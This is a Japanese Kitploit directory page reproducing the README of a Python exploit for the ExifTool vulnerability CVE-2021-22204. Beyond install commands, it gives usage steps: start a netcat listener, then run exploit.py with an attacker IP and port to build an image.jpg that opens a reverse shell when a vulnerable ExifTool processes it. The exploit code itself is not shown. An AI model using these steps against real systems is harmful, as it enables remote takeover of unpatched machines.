Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-22204-exiftool — Python製のCVE-2021-22204(ExifTool)向けエクスプロイト。悪意のある画像を生成し、脆弱なバージョンで処理されるとリバースシェルを起動します。 | Kitploit
ツール/GitHubGitHub/mr-tuhin/cve-2021-22204-exiftool
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmr-tuhin/cve-2021-22204-exiftool

CVE-2021-22204-exiftool

Python製のCVE-2021-22204(ExifTool)向けエクスプロイト。悪意のある画像を生成し、脆弱なバージョンで処理されるとリバースシェルを起動します。

リポジトリを見る
924年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-22204-exiftool

Exiftool の CVE-2021-22204 脆弱性に対する Python エクスプロイトです。

ビデオチュートリアル

Youtube

root@kitploit:~
    404 notfound

要件

root@kitploit:~
python3 python3-pip djvulibre-bin exiftool

要件のインストール

Debian

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Ubuntu

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Arch Linux

root@kitploit:~
    pacman -S djvulibre libimage-exiftool-perl python python-pip

Kali Linux

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Fedora

root@kitploit:~
    dnf install djvulibre libimage-exiftool-perl python-minimal python-pip

OS X

root@kitploit:~
    brew install djvulibre exiftool python

Raspbian

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

実行方法:

Python 要件のインストール

root@kitploit:~
    sudo pip install -r requirements.txt

netcat でリバースシェルを開始

root@kitploit:~
    nc -nvlp 4444

実行権限を付与

root@kitploit:~
    chmod +x exploit.py

プログラムを実行

root@kitploit:~
    python3 exploit.py {あなたのIPアドレス} {あなたのリッスンポート} 
    

または

root@kitploit:~
    ./exploit.py {あなたのIPアドレス} {あなたのリッスンポート}

例

root@kitploit:~
    python3 exploit.py 192.168.0.1 4444
    

または

root@kitploit:~
    ./exploit.py 192.168.0.1 4444

出力ファイル名は

root@kitploit:~
    image.jpg
    

脆弱性について

CVE-2021-22204 は William Bowling (@wcbowling) によって発見され、報告されました。

このエクスプロイトは、CVE が報告された後に exiftool のパッチを研究して作成されました。

そして、image.jpg は、脆弱性のある exiftool で開かれると脆弱性をトリガーします。

ツールをダウンロード